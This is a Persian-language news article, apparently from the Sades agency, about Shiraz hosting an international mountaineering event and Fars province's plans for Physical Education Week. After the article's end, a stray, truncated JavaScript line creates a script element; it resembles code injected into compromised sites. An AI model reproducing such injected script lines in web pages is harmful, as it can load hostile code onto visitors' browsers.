شیراز، میزبان بزرگترین رویداد کوهنوردی ایران خواهد بود


صعود تیم کوهنوردی سادس به قله سبلان

مدیرکل ورزش و جوانان استان فارس گفت: طی هفته‌های آینده شیراز میزبان بزرگترین رویداد کوهنوردی ایران خواهد بود.

حیدرعلی کامیاب در گفت و گو با سادس گفت: در نیمه سوم مهر، بزرگترین رویداد کوهنوردی ایران با حضور ورزشکارانی از 29 کشور جهان در شیراز برگزار می‌شود.

وی با بیان اینکه تبلیغات و اطلاع‌رسانی بزرگترین ضعف ورزش و جوانان فارس به شمار می‌رود، گفت: به دنبال رخ‌دادهای بین‌المللی و ملی که طی 2 سال گذشته در شیراز و فارس برگزار شده‌ است، بزرگترین رویداد کوهنوردی نیز در سطحی بین‌المللی را میزبانی خواهیم کرد.

کامیاب خاطرنشان کرد: بیش از 100 کوهنورد و شخصیت ورزشی بین‌المللی از سراسر جهان در این رویداد حضور خواهند داشت؛ این یک فرصت برای معرفی داشته‌های شیراز خصوصا در حوزه ورزش و توریست ورزشی است.

او با تصریح اینکه شیراز و فارس در این سال‌ها نشان داده که در رشته‌های مختلف می‌تواند پایگاه رخ‌دادهای بین‌المللی ورزشی باشد، گفت: رخ‌دادهایی که در شیراز و فارس برگزار شد اگر در هر شهر دیگری بود شاهد گستردگی تبلیغات و همراهی تمام بخش‌ها و اداره‌ها در این راستا بودیم.

کامیاب همچنین از برنامه‌ریزی برای برگزاری هفته تربیت‌بدنی در فارس خبر داد و گفت: در 30 شهرستان و 100 شهر و اکثر بخش‌ها و دهستان‌ها با همکاری 900 هیات ورزشی، برنامه‌های متنوعی در ابعاد مختلف برگزار خواهیم کرد.

مدیرکل ورزش و جوانان فارس با بیان اینکه اطلاع‌رسانی در خصوص جزئیات این برنامه‌ها در آستانه هفته تربیت‌بدنی انجام می‌شود، گفت: برنامه‌هایی در سطوح مختلف ورزش همگانی، قهرمانی و محله‌ای به همراه برنامه‌های ویژه فرهنگی و اجتماعی در حوزه جوانان، پیش‌بینی شده است.

کامیاب گفت: یکی از برنامه‌های پیش‌بینی شده در هفته تربیت بدنی، بهره‌برداری از 15 پروژه تاثیرگذار عمرانی در حوزه ورزش و جوانان در سراسر فارس است.

مدیرکل ورزش و جوانان استان فارس مهمترین پروژه را سالن ورزشی محبی گراش اعلام و ابراز امیدواری کرد که این پروژه با حضور وزیر ورزش و جوانان افتتاح شود.

انتهای پیام

var d=document;var s=d.createElement(‘script’);

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *